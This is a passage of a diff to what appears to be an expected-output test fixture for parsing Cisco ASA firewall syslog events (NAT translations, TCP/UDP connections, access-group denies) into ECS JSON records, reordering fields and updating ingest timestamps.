"observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100350100Z", + "ingested": "2021-12-14T14:39:19.188530216Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100372600Z", + "ingested": "2021-12-14T14:39:19.188530635Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100378600Z", + "ingested": "2021-12-14T14:39:19.188531035Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100384500Z", + "ingested": "2021-12-14T14:39:19.188531433Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100393200Z", + "ingested": "2021-12-14T14:39:19.188531817Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100399200Z", + "ingested": "2021-12-14T14:39:19.188532195Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100405200Z", + "ingested": "2021-12-14T14:39:19.188532583Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100411100Z", + "ingested": "2021-12-14T14:39:19.188533080Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100417Z", + "ingested": "2021-12-14T14:39:19.188533465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100422900Z", + "ingested": "2021-12-14T14:39:19.188533850Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100428800Z", + "ingested": "2021-12-14T14:39:19.188534231Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100433400Z", + "ingested": "2021-12-14T14:39:19.188534624Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100437Z", + "ingested": "2021-12-14T14:39:19.188535036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100441600Z", + "ingested": "2021-12-14T14:39:19.188535429Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100447Z", + "ingested": "2021-12-14T14:39:19.188535825Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100452Z", + "ingested": "2021-12-14T14:39:19.188536216Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100457900Z", + "ingested": "2021-12-14T14:39:19.188536606Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100462300Z", + "ingested": "2021-12-14T14:39:19.188536996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100466700Z", + "ingested": "2021-12-14T14:39:19.188537445Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100471300Z", + "ingested": "2021-12-14T14:39:19.188537875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100477100Z", + "ingested": "2021-12-14T14:39:19.188538265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100483Z", + "ingested": "2021-12-14T14:39:19.188538665Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100488800Z", + "ingested": "2021-12-14T14:39:19.188539051Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100530100Z", + "ingested": "2021-12-14T14:39:19.188539433Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100534300Z", + "ingested": "2021-12-14T14:39:19.188539845Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", @@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100538600Z", + "ingested": "2021-12-14T14:39:19.188540238Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100542200Z", + "ingested": "2021-12-14T14:39:19.188540630Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", @@ -17529,25 +17526,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100546100Z", + "ingested": "2021-12-14T14:39:19.188541020Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100551Z", + "ingested": "2021-12-14T14:39:19.188541414Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", @@ -17623,25 +17620,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100557200Z", + "ingested": "2021-12-14T14:39:19.188542160Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100563200Z", + "ingested": "2021-12-14T14:39:19.188542607Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", @@ -17717,25 +17714,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100569100Z", + "ingested": "2021-12-14T14:39:19.188543005Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:34:28.100574900Z", + "ingested": "2021-12-14T14:39:19.188543399Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100580800Z", + "ingested": "2021-12-14T14:39:19.188543779Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100586700Z", + "ingested": "2021-12-14T14:39:19.188544234Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100592500Z", + "ingested": "2021-12-14T14:39:19.188544707Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100598400Z", + "ingested": "2021-12-14T14:39:19.188545086Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100604500Z", + "ingested": "2021-12-14T14:39:19.188545465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100610200Z", + "ingested": "2021-12-14T14:39:19.188545856Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100616100Z", + "ingested": "2021-12-14T14:39:19.188546247Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100622Z", + "ingested": "2021-12-14T14:39:19.188546639Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100627900Z", + "ingested": "2021-12-14T14:39:19.188547136Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100633800Z", + "ingested": "2021-12-14T14:39:19.188547517Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100639700Z", + "ingested": "2021-12-14T14:39:19.188547907Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100644200Z", + "ingested": "2021-12-14T14:39:19.188548292Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst 